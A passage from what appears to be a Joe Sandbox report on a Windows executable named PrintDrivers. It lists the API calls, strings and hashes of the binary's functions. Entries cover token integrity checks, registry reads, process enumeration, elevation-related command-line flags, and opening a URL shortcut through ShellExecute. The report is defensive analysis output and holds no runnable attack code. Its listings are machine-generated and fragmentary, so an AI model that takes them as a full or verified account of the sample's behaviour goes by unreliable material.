                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00585B08,F3F544E4), ref: 00585BA4
                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00585B08,F3F544E4), ref: 00585BAE
                                                                    • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00585B08,F3F544E4), ref: 00585C0A
                                                                    Similarity
                                                                    • API ID: InformationToken$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2567405617-0

                                                                    Control-flow Graph
                                                                    control_flow_graph 300 5bcfd5-5bcfe2 call 5b985e 302 5bcfe7-5bcff2 300->302 303 5bcff8-5bd000 302->303 304 5bcff4-5bcff6 302->304 305 5bd043-5bd04f call 5b6238 303->305 306 5bd002-5bd006 303->306 304->305 308 5bd008-5bd03d call 5b8473 306->308 312 5bd03f-5bd042 308->312 312->305
                                                                    APIs
                                                                      • Part of subcall function 005B985E: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005B67EE,00000001,00000364,00000006,000000FF,?,00000000,?,005A93A9,00000000,?,005A9421), ref: 005B989F
                                                                    • _free.LIBCMT ref: 005BD044
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free
                                                                    • String ID:
                                                                    • API String ID: 614378929-0

                                                                    Control-flow Graph
                                                                    control_flow_graph 313 5b985e-5b9869 314 5b986b-5b9875 313->314 315 5b9877-5b987d 313->315 314->315 316 5b98ab-5b98b6 call 5a9a7c 314->316 317 5b987f-5b9880 315->317 318 5b9896-5b98a7 RtlAllocateHeap 315->318 324 5b98b8-5b98ba 316->324 317->318 320 5b98a9 318->320 321 5b9882-5b9889 call 5b60c2 318->321 320->324 321->316 326 5b988b-5b9894 call 5bcb6e 321->326 326->316 326->318
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,005B67EE,00000001,00000364,00000006,000000FF,?,00000000,?,005A93A9,00000000,?,005A9421), ref: 005B989F
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0

                                                                    Control-flow Graph
                                                                    control_flow_graph 471 5a3d28-5a3fe1 GetModuleHandleW GetProcAddress * 40
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 005A3D2E
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 005A3D3C
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 005A3D4D
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 005A3D5E
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 005A3D6F
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 005A3D80
                                                                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 005A3D91
                                                                    • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 005A3DA2
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 005A3DB3
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 005A3DC4
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 005A3DD5
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 005A3DE6
                                                                    • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 005A3DF7
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 005A3E08
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 005A3E19
                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 005A3E2A
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 005A3E3B
                                                                    • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 005A3E4C
                                                                    • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 005A3E5D
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 005A3E6E
                                                                    • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 005A3E7F
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 005A3E90
                                                                    • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 005A3EA1
                                                                    • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 005A3EB2
                                                                    • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 005A3EC3
                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 005A3ED4
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 005A3EE5
                                                                    • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 005A3EF6
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005A3F07
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005A3F18
                                                                    • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 005A3F29
                                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 005A3F3A
                                                                    • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 005A3F4B
                                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 005A3F5C
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 005A3F6D
                                                                    • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 005A3F7E
                                                                    • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 005A3F8F
                                                                    • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 005A3FA0
                                                                    • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 005A3FB1
                                                                    • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 005A3FC2
                                                                    • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 005A3FD3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressProc$HandleModule
                                                                    • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                    • API String ID: 667068680-295688737
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00590246
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,005E16B0,00000800), ref: 00590263
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: OpenQueryValue
                                                                    • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin $<s]$ls]
                                                                    • API String ID: 4153817207-3792383248
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,005BF491,00000002,00000000,?,?,?,005BF491,?,00000000), ref: 005BF20C
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,005BF491,00000002,00000000,?,?,?,005BF491,?,00000000), ref: 005BF235
                                                                    • GetACP.KERNEL32(?,?,005BF491,?,00000000), ref: 005BF24A
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: efdbb712bb9cae7b4e3ff5f615426be1ec8658039de9100f18ade4eb82952447
                                                                    • Instruction ID: bab895e3cacc93e887d488749b33a73fb82073f66f6c7d90585d823d4cd2eb01
                                                                    • Opcode Fuzzy Hash: efdbb712bb9cae7b4e3ff5f615426be1ec8658039de9100f18ade4eb82952447
                                                                    • Instruction Fuzzy Hash: FB216D3A600102EADB34DF58DD05ADBBAA7FB94B54B668834E90AD7211E732FD41D390
                                                                    APIs
                                                                      • Part of subcall function 005B664C: GetLastError.KERNEL32(?,?,00000008,005BB99E,00594425,0059446B), ref: 005B6651
                                                                      • Part of subcall function 005B664C: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 005B66EF
                                                                      • Part of subcall function 005B664C: _free.LIBCMT ref: 005B66AE
                                                                      • Part of subcall function 005B664C: _free.LIBCMT ref: 005B66E4
                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 005BF454
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 005BF49D
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 005BF4AC
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 005BF4F4
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 005BF513
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                    • String ID:
                                                                    • API String ID: 949163717-0
                                                                    • Opcode ID: c687ae15968b430816be8be1de4217caf405f5acc619dd1fce0324b044789a09
                                                                    • Instruction ID: d6a8fa158f1a7d1e5787cfe60a9fffd176f09aa0b0771f531ba261fb330c25ab
                                                                    • Opcode Fuzzy Hash: c687ae15968b430816be8be1de4217caf405f5acc619dd1fce0324b044789a09
                                                                    • Instruction Fuzzy Hash: B6516C72A00606AEDF10DFA5DC49AFFBBB8BF58700F184479A915E7190EB71A904CB61
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(00588D68,?,005B3C83,?,?,00588D68,?,00588D68,00000000), ref: 005B3CA6
                                                                    • TerminateProcess.KERNEL32(00000000,?,005B3C83,?,?,00588D68,?,00588D68,00000000), ref: 005B3CAD
                                                                    • ExitProcess.KERNEL32 ref: 005B3CBF
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 928c39a0ce39b428eb5afbee992a4c1d203f32221e8c509449f60db369ba4a9e
                                                                    • Instruction ID: 42d6651885d552a375eb1cb77e900b47f4d02f337191918d14f69f7955e6f96c
                                                                    • Opcode Fuzzy Hash: 928c39a0ce39b428eb5afbee992a4c1d203f32221e8c509449f60db369ba4a9e
                                                                    • Instruction Fuzzy Hash: DFE0EC31400A49AFDF116FA4DE0DE883F69FF50741F044424F909A6231DB75EE55DB80
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005A545E
                                                                    Similarity
                                                                    • API ID: FeaturePresentProcessor
                                                                    • String ID:
                                                                    • API String ID: 2325560087-0
                                                                    • Opcode ID: d2f2a445e38d0e4d35180a6942d5c8e969b23cc3030696044c2eab1a8844ad4b
                                                                    • Instruction ID: 9f298936ad2d299df902f34d44fe8ae7b7ff57faa6dda22355007d1276254b3a
                                                                    • Opcode Fuzzy Hash: d2f2a445e38d0e4d35180a6942d5c8e969b23cc3030696044c2eab1a8844ad4b
                                                                    • Instruction Fuzzy Hash: CC5180B2D11A05CFDB19CF98DD85BAEBBF1FB58314F18852AC406EB290E374A945CB50
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a01284ca2dcea0d8dfe0b1ce5a1ddc763ba725492e82a202574a37f112f822d4
                                                                    • Instruction ID: 8992c0407ec79b67afbfce1d1d8d2f90bf0233a35334bc5f9faff420ab745425
                                                                    • Opcode Fuzzy Hash: a01284ca2dcea0d8dfe0b1ce5a1ddc763ba725492e82a202574a37f112f822d4
                                                                    • Instruction Fuzzy Hash: 4BE08C32915228EBCB14DB8DC9489CAFBECFB84B50B150196B601D3200C2B0EE00CBD0
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?), ref: 005863CE
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00586427
                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00586432
                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0058644E
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 0058652B
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 00586537
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005C66A5), ref: 0058657F
                                                                    • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 0058659A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,005C66A5), ref: 005865B7
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 005865E1
                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00586628
                                                                    • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 0058667A
                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,005C66A5,000000FF), ref: 005866AC
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                    • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                    • API String ID: 2199533872-3004881174
                                                                    • Opcode ID: 19fdd87a881b7a4627fe939c90e836688281f973d229bd6ce30bc25b88813ed7
                                                                    • Instruction ID: e04723da6464f30cd30bb5d45254bfcbdcb6cbe8f1eac4c7fb2ec0e2b15d468a
                                                                    • Opcode Fuzzy Hash: 19fdd87a881b7a4627fe939c90e836688281f973d229bd6ce30bc25b88813ed7
                                                                    • Instruction Fuzzy Hash: 75B1F471900249AFEB20EF68CC8ABEF7FA4BF55700F144169E914BB2D1D7719A09C7A1
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _free$Info
                                                                    • String ID:
                                                                    • API String ID: 2509303402-0
                                                                    • Opcode ID: 11316624d7a4d7218cfbe68effe748491062daff372c5a5e46b2679880112299
                                                                    • Instruction ID: 23a13e2f7d257b30b300d00d702b0f33809282ebeb375a03fccd3b29f4a025de
                                                                    • Opcode Fuzzy Hash: 11316624d7a4d7218cfbe68effe748491062daff372c5a5e46b2679880112299
                                                                    • Instruction Fuzzy Hash: 4FD1AB7590020A9FEB11DFA8C885BEEFFF5BF48300F144129E599AB282D775A945CB60
                                                                    APIs
                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(005E0D24,00000FA0,?,?,005A49F5), ref: 005A4A23
                                                                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,005A49F5), ref: 005A4A2E
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,005A49F5), ref: 005A4A3F
                                                                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 005A4A51
                                                                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 005A4A5F
                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,005A49F5), ref: 005A4A82
                                                                    • ___scrt_fastfail.LIBCMT ref: 005A4A93
                                                                    • DeleteCriticalSection.KERNEL32(005E0D24,00000007,?,?,005A49F5), ref: 005A4A9E
                                                                    • CloseHandle.KERNEL32(00000000,?,?,005A49F5), ref: 005A4AAE
                                                                    Strings
                                                                    • SleepConditionVariableCS, xrefs: 005A4A4B
                                                                    • WakeAllConditionVariable, xrefs: 005A4A57
                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 005A4A29
                                                                    • kernel32.dll, xrefs: 005A4A3A
                                                                    Similarity
                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin___scrt_fastfail
                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                    • API String ID: 3578986977-3242537097
                                                                    • Opcode ID: 087d98ca799fb7ad2a264bd9b6d88fca0cc580600aa388d535085bd9e3be1eef
                                                                    • Instruction ID: 076634c5f1463e2ffef347eec5ca5bf16de8e9f7b50e977b2b68607d28f06700
                                                                    • Opcode Fuzzy Hash: 087d98ca799fb7ad2a264bd9b6d88fca0cc580600aa388d535085bd9e3be1eef
                                                                    • Instruction Fuzzy Hash: 2601F531A80B16AFDB211BF1AC4DE5A3EA9BBA1B01B041014BC00E7290EBF0C804DBA5
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 005BE012
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD297
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2A9
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2BB
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2CD
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2DF
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2F1
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD303
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD315
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD327
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD339
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD34B
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD35D
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD36F
                                                                    • _free.LIBCMT ref: 005BE007
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005BE029
                                                                    • _free.LIBCMT ref: 005BE03E
                                                                    • _free.LIBCMT ref: 005BE049
                                                                    • _free.LIBCMT ref: 005BE06B
                                                                    • _free.LIBCMT ref: 005BE07E
                                                                    • _free.LIBCMT ref: 005BE08C
                                                                    • _free.LIBCMT ref: 005BE097
                                                                    • _free.LIBCMT ref: 005BE0CF
                                                                    • _free.LIBCMT ref: 005BE0D6
                                                                    • _free.LIBCMT ref: 005BE0F3
                                                                    • _free.LIBCMT ref: 005BE10B
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 34b6cce3702b0ba5d49d0d070566cdeeba2922134e0eca24fc41bb3483e78f14
                                                                    • Instruction ID: 0696d5443f037c314788971cd645e30db119620be70a2466c8c008c6b313f743
                                                                    • Opcode Fuzzy Hash: 34b6cce3702b0ba5d49d0d070566cdeeba2922134e0eca24fc41bb3483e78f14
                                                                    • Instruction Fuzzy Hash: EA314F355006099FEB30AA78D84ABDABBE9BF50350F584929E459DB151DFB9FC40CB10
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: bdf19d87500df6fede75ef0652c857ecd19eab40fadc331f28921d0103987881
                                                                    • Instruction ID: 119407feeb2d7abaa58e8e8fe7ab5ed041131105fc91476a108a78c5b2ec7eea
                                                                    • Opcode Fuzzy Hash: bdf19d87500df6fede75ef0652c857ecd19eab40fadc331f28921d0103987881
                                                                    • Instruction Fuzzy Hash: 37C12675D40205AFEB20DB98CC47FDEBBF8BB48700F144565FA05EB282E6B4A94187A4
                                                                    APIs
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 005A81AE
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 005A81D5
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 005A82E1
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 005A83BC
                                                                    • _UnwindNestedFrames.LIBCMT ref: 005A8443
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 005A845E
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2123188842-393685449
                                                                    • Opcode ID: b9fc11d09e818130cd4829fbe6661f2e496da3b0c08bd848191c4be171abc1a1
                                                                    • Instruction ID: fa756dffc537607cb1ebb025e6a1b860b9825a659b62c1d681309e6a8796ee54
                                                                    • Opcode Fuzzy Hash: b9fc11d09e818130cd4829fbe6661f2e496da3b0c08bd848191c4be171abc1a1
                                                                    • Instruction Fuzzy Hash: 70C1697180020AEFCF25DFA8C885ABEBFB5FF4A710F14455AE8116B252DB31DA51CB91
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059AD74
                                                                    • _Maklocstr.LIBCPMT ref: 0059ADDD
                                                                    • _Maklocstr.LIBCPMT ref: 0059ADEF
                                                                    • _Maklocchr.LIBCPMT ref: 0059AE07
                                                                    • _Maklocchr.LIBCPMT ref: 0059AE17
                                                                    • _Getvals.LIBCPMT ref: 0059AE39
                                                                      • Part of subcall function 00595699: _Maklocchr.LIBCPMT ref: 005956C8
                                                                      • Part of subcall function 00595699: _Maklocchr.LIBCPMT ref: 005956DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                    • String ID: false$iw]$true
                                                                    • API String ID: 3549167292-1778967338
                                                                    • Opcode ID: bf46e9516ce490a6bab91c5c11caf115b7f341b63d8d32cd1f5afa9cd95580fa
                                                                    • Instruction ID: 2f2c2e6af977d74151c4bcfaec0fae9deff8402af8b397b13225f760733a7205
                                                                    • Opcode Fuzzy Hash: bf46e9516ce490a6bab91c5c11caf115b7f341b63d8d32cd1f5afa9cd95580fa
                                                                    • Instruction Fuzzy Hash: 442181B1D00319AADF15EFA4D889ADE7FB8FF49710F10841AF9049F242EA708944CFA1
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,F3F544E4,?,?,00000002), ref: 00584612
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,F3F544E4,?,?,00000002), ref: 00584633
                                                                    • GetProcessTimes.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584666
                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584677
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 00584695
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 005846B1
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 005846D9
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 005846F5
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 00584713
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 0058472F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process$OpenTimes
                                                                    • String ID:
                                                                    • API String ID: 1711917922-0
                                                                    • Opcode ID: 0de8e7574411ad5178cc1c881991dcda0178c54a1594e38044622673a49445fc
                                                                    • Instruction ID: f9c1425cff6c7ab525284240257875b9c2c7c87734509fb261fa4ea0244d9476
                                                                    • Opcode Fuzzy Hash: 0de8e7574411ad5178cc1c881991dcda0178c54a1594e38044622673a49445fc
                                                                    • Instruction Fuzzy Hash: 20517770D01619ABDB20DF99D988BAEBFF4FB49714F20421AED10B7384D77459058FA8
                                                                    APIs
                                                                    • _free.LIBCMT ref: 005B654A
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005B6556
                                                                    • _free.LIBCMT ref: 005B6561
                                                                    • _free.LIBCMT ref: 005B656C
                                                                    • _free.LIBCMT ref: 005B6577
                                                                    • _free.LIBCMT ref: 005B6582
                                                                    • _free.LIBCMT ref: 005B658D
                                                                    • _free.LIBCMT ref: 005B6598
                                                                    • _free.LIBCMT ref: 005B65A3
                                                                    • _free.LIBCMT ref: 005B65B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 7d481faac3348df9dc35e9589146c667b1e7456890488090ae2c45ef9bbcc6ac
                                                                    • Instruction ID: 584b1164b9895f9c131b8ccdb56360b072f7d3617e8048cd16185b931a0dc691
                                                                    • Opcode Fuzzy Hash: 7d481faac3348df9dc35e9589146c667b1e7456890488090ae2c45ef9bbcc6ac
                                                                    • Instruction Fuzzy Hash: AF21977A900109AFDB41EF94C885DDEBFB9BF48340F8045A6F515AF121DB39EA55CB80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059DA5E
                                                                      • Part of subcall function 00595F15: __EH_prolog3.LIBCMT ref: 00595F1C
                                                                      • Part of subcall function 00595F15: std::_Lockit::_Lockit.LIBCPMT ref: 00595F26
                                                                      • Part of subcall function 00595F15: std::_Lockit::~_Lockit.LIBCPMT ref: 00595F97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
